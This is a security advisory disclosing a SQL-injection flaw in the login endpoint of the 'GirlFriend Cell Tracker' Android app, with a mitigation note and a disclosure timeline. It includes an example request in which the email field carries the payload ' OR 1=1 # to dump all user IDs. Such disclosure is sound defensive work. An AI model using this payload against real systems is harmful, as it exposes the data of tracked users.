SIK-2017-047
Title:
Complete Access to all User IDs in GirlFriend Cell Tracker App
Report ID
SIK-2017-047
Summary:
- Vendor: SoftSquare InfoSoft
- Product: GirlFriend Cell Tracker App (Package-Name: com.omrup.cell.tracker)
- Affected Version: 1.20
- Severity: High
- Short summary: Nearly all endpoint yield a classic SQL-Injection by just using simple SQL-Syntax as a parameter in the HTTP request.
Details:
The backend is self-implemented and is accessable without any reasonable acccess control.
In particular, the login endpoint can be addressed by a POST request as follows:
POST http://****/****/api/login
{
"user_email": "{the user email}"
}
When changing the user email to a SQL-Injection, one can obtain all user ids
POST http://****/****/api/login
{
"user_email": "' OR 1=1 #"
}
Workaround
–
Suggested Mitigation
The backend is broken on a conceptional level. Please implement a proper access control mechanism. The OWASP Access Control Cheat Sheet may help.
Timeline
- 2017-08-09: Vulnerability Discovered
- 2017-08-29: First Email sent to developer
- 2018-08-11: Published